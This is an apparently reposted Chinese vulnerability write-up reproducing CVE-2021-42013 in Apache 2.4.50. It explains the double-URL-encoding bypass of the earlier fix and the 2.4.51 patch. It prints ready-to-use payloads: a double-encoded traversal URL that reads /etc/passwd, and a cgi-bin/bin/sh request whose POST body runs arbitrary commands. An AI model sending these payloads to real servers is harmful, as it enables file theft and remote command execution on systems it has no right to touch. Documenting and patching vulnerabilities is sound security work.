当前位置: 首页 > article >正文

CVE-2021-42013 漏洞复现

CVE-2021-42013

漏洞版本:Apache 2.4.50

Apache版本2.4.50是对CVE-2021-(版本2.4.49)的修复,但是修复不完整导致可以绕过,从而产生了CVE-2021-42013(版本2.4.50)。

这时修复了对.%2e的检测。

在处理外部HTTP请求时,会调用 ap_process_request_internal函数对url路径进行处理,在该函数中,首先会调用ap_normalize_path函数进行一次url解码,之后会调用ap_unescape_url函数进行二次解码。

这时候我们只需要将…/url编码两次就行了。

ap_normalize_path函数调用栈如下,在处理前path参数为/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

经过ap_normalize_path函数处理后path参数变成/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd

经过unescape_url函数处理后,可以看到此时的url字符串内容变成/icons/../../../../etc/passwd

补充一下:

对于没有进⾏安全配置的Apache服务器,默认情况可以⽤xxx.com/icons/的⽅式打开Apache⽬录下的icons⽂件夹,并且会罗列出⽂件列表。(一、可以路径穿越读取文件)

读取文件:

URL/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

在服务端开启了cgi或cgid这两个mod的情况下xxx.com/cgi-bin/xxx/bin/sh,这个路径穿越漏洞将可以执行任意命令。POST方式直接提交命令,前面要加一个echo;。(二、可以命令执行)

执行命令:

URL/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

POST:echo;nl /ffffllllaaagggg_cc084c485d

对两个CVE的修复:

2.4.51版本针对该漏洞进行了多处修改,最核心的一处修改是在ap_normalize_path函数中加强了对url编码的校验,如果检测到存在非标准url编码(不是%+两个十六进制字符)的情况,就返回编码错误,从根本上杜绝了多重编码可能导致的绕过。


http://www.kler.cn/a/233681.html

相关文章:

  • Javaweb—Ajax与jQuery请求
  • 数字后端教程之Innovus report_property和get_property使用方法及应用案例
  • C++ 的协程
  • Leecode热题100-35.搜索插入位置
  • 建筑施工特种作业人员安全生产知识试题
  • 前端垂直居中的多种实现方式及应用分析
  • java_error_in_pycharm.hprof文件是什么?能删除吗?
  • 算法之双指针系列1
  • [python-opencv] PNG 裁切物体
  • 【春节特辑】回顾与展望:运维软件领域的2023与2024
  • 计算机网络-差错控制(奇偶校验码 CRC循环冗余码)
  • SpringCloud-搭建Nacos服务中心
  • 【前端高频面试题--Vue生命周期篇】
  • K8S之运用亲和性设置Pod的调度约束
  • docker实际生产中遇到的问题及解决办法
  • 前端配置了axios.defaults.withCredentials = true,但出现了跨域问题
  • 数据结构——5.5 树与二叉树的应用
  • 【错误文档】This与Here的区别、主系表结构、如何合并两个句子、祈使句结构
  • linux 07 存储管理
  • kali最新最简单安装
  • 社区店选址要素揭秘:人流量与商业潜力的关键
  • 十大排序算法之线性时间非比较类排序
  • 电商小程序05用户注册
  • 吉他学习:C大调第一把位音阶,四四拍曲目练习 小星星,练习的目的
  • Mac OS 取消隔离扩展属性
  • HCIA-HarmonyOS设备开发认证V2.0-3.2.轻量系统内核基础-时间管理